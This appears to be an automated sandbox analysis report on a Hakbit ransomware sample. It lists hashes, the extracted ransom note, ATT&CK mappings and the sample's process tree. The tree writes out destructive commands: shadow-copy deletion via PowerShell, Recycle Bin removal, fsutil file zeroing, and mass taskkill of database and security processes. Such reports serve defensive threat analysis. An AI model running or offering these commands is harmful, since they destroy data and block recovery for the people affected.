hakbit | 1423053f90855d33858db47f354055b660943104c1c18f848c9b7b415979dc5f

max time kernel
1s
max time network
54s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 18:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
SSDEEP

1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score

10^/10

hakbit evasion execution ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below [email protected] Key Identifier: ltZwM8vdXqghzqyC1qwt/nqsJGzxnxhz82l7b7bOcSfO8T6LO289nYVhGGqQY6TINUKeB+0sItgzO65S2Ba4+5XD4czib0Yyi6hetsxzDuID8p5LaCHgtV8kiE7agNEc6MNAlT3kz5GAc/754zLzWkFGUPXBQyAAo8Lb33tgpAESvK5Qnqebx6eAISEgx2y6GPcBE3TWBzzKYrib+XZeEZ6vRmNUdGlSVm5DqnF1DLPIWg2dqwbyArWP4TKfaZJY/OxkkB8od/wfMmD3YMI9ikoptLBscflkSTGmfnZ7prDSMDFw17BU2cMZUq6hKjIw6EQofTi7kKcn2+Ctg/34ihvj+nGuNRpDwuVFtfj89nPQfVkHT+at6aORSeLzDVpv3Ri9oFZjvJRtVTMU7YPgQuOfEE53xgVmwDOnPWusFmNKb+bkVzrhlEPPFRdiWJ9MS6yAXCNFeNOlRWKCToKx9ktKkbbe1/kMoMNMSLWsKd0ZY96UZPVHqfkwEKPVmcx4PsWDznglN/2ApiFsHJzKahAm+uOfbT4P23nuvZAQdFsRMgKK7iMV0yW/fSH3Y29yEHO4vZvYBKuZR4JVUwZqWpNSPRPPLQ6g0eEbnZwUGjqsQFm62lFc2UwoJs6LMfQBxZwOgS6X7NOzUxzOPPD+/YJnMKWTs4GJ0xEqLtqnjI0= Number of files that were processed is: 412

Emails

[email protected]

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
32	sc.exe
5036	sc.exe
968	sc.exe
1824	sc.exe

Kills process with taskkill 47 IoCs

evasion

pid	Process
4928	taskkill.exe
2336	taskkill.exe
2300	taskkill.exe
4480	taskkill.exe
2192	taskkill.exe
5060	taskkill.exe
4560	taskkill.exe
4168	taskkill.exe
2484	taskkill.exe
4748	taskkill.exe
2504	taskkill.exe
2572	taskkill.exe
4108	taskkill.exe
1400	taskkill.exe
5096	taskkill.exe
4700	taskkill.exe
3128	taskkill.exe
3428	taskkill.exe
3520	taskkill.exe
4488	taskkill.exe
1884	taskkill.exe
2596	taskkill.exe
4996	taskkill.exe
5048	taskkill.exe
1640	taskkill.exe
3228	taskkill.exe
3044	taskkill.exe
1140	taskkill.exe
1716	taskkill.exe
2368	taskkill.exe
2820	taskkill.exe
228	taskkill.exe
4160	taskkill.exe
3152	taskkill.exe
4072	taskkill.exe
3524	taskkill.exe
3432	taskkill.exe
1204	taskkill.exe
4200	taskkill.exe
3956	taskkill.exe
2268	taskkill.exe
4036	taskkill.exe
428	taskkill.exe
1124	taskkill.exe
3688	taskkill.exe
4012	taskkill.exe
3600	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
6464	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2364	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3596 wrote to memory of 32	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 3596 wrote to memory of 32	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 3596 wrote to memory of 1824	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	81
PID 3596 wrote to memory of 1824	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	81
PID 3596 wrote to memory of 968	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 3596 wrote to memory of 968	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 3596 wrote to memory of 1020	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 3596 wrote to memory of 1020	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 3596 wrote to memory of 5036	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	87
PID 3596 wrote to memory of 5036	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	87
PID 3596 wrote to memory of 3688	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 3596 wrote to memory of 3688	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 3596 wrote to memory of 4160	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 3596 wrote to memory of 4160	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 3596 wrote to memory of 3600	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 3596 wrote to memory of 3600	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 3596 wrote to memory of 3044	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 3596 wrote to memory of 3044	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 3596 wrote to memory of 1124	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 3596 wrote to memory of 1124	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 3596 wrote to memory of 2504	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 3596 wrote to memory of 2504	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 3596 wrote to memory of 4748	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	94
PID 3596 wrote to memory of 4748	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	94
PID 3596 wrote to memory of 3956	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 3596 wrote to memory of 3956	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 3596 wrote to memory of 5096	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 3596 wrote to memory of 5096	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 3596 wrote to memory of 4200	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	97
PID 3596 wrote to memory of 4200	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	97
PID 3596 wrote to memory of 1204	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 3596 wrote to memory of 1204	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 3596 wrote to memory of 2484	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	99
PID 3596 wrote to memory of 2484	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	99
PID 3596 wrote to memory of 2192	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	100
PID 3596 wrote to memory of 2192	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	100
PID 3596 wrote to memory of 3432	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	101
PID 3596 wrote to memory of 3432	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	101
PID 3596 wrote to memory of 428	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	102
PID 3596 wrote to memory of 428	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	102
PID 3596 wrote to memory of 228	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	103
PID 3596 wrote to memory of 228	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	103
PID 3596 wrote to memory of 3228	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	104
PID 3596 wrote to memory of 3228	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	104
PID 3596 wrote to memory of 4480	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	105
PID 3596 wrote to memory of 4480	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	105
PID 3596 wrote to memory of 1640	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	106
PID 3596 wrote to memory of 1640	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	106
PID 3596 wrote to memory of 3524	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	107
PID 3596 wrote to memory of 3524	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	107
PID 3596 wrote to memory of 4012	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	108
PID 3596 wrote to memory of 4012	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	108
PID 3596 wrote to memory of 2300	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	109
PID 3596 wrote to memory of 2300	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	109
PID 3596 wrote to memory of 4072	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	110
PID 3596 wrote to memory of 4072	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	110
PID 3596 wrote to memory of 2820	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	111
PID 3596 wrote to memory of 2820	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	111
PID 3596 wrote to memory of 4036	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	112
PID 3596 wrote to memory of 4036	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	112
PID 3596 wrote to memory of 1400	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	113
PID 3596 wrote to memory of 1400	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	113
PID 3596 wrote to memory of 3152	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 3596 wrote to memory of 3152	3596	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:32
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:1824
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:968
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1020
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:5036
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:3688
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4160
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:3600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:3044
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1124
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:2504
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4748
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:3956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:5096
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4200
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:1204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:2484
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:2192
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:3432
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:228
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:3228
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:4480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:1640
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:3524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4012
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:2300
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:4072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:2820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:4036
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1400
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:3152
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:4108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:4168
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:5048
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:4700
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:2368
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:4996
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:2336
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:4560
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:2596
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:1716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:4488
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:3520
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:2268
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:5060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:4928
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:3428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:1140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:3128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:4584
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:6464
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:6448
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2364
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
  2⤵
  PID:5800
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6484

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

Filesize
1.3MB

MD5
12c5cd323ba9b7c9f2161f7ecd52227b

SHA1
cf75d826f3a0201e69f1ca04a5a4a8f8c537319d

SHA256
58f2f1d4861259a830d145c1c0777acd96f0c27c34cc4e71037e8fdd36a8c930

SHA512
0574387474155662270a5070f9d6fdf44e74672ef1487a6c5afdb92f1af240bae8e8dc62f9d34d9f7b71cbc64d46d86f3ebaca4304135277afaaaed9ab698c87

Download Submit
C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

Filesize
7.4MB

MD5
3ce38d7432445dc23eadef0904969a59

SHA1
fadbd35e645e6868a95e76e436d240f38c58f90d

SHA256
319f6a74862b1ebd20636ab1f4058a6e157ad3e12e178f1647db8acfeed75462

SHA512
c97d0d2af01b4af902cc21680d905d27a1280dd0b2c416e2a508165c8a87a69e09a105965540cb91acbffda58668fd81b927a19d0a414a7208d44f498c974a7f

Download Submit
C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]

Filesize
728KB

MD5
aa91bf5895da8b7fe93b94953869e672

SHA1
d0a9b03d7b768da29132061761cc812d91fc7e5f

SHA256
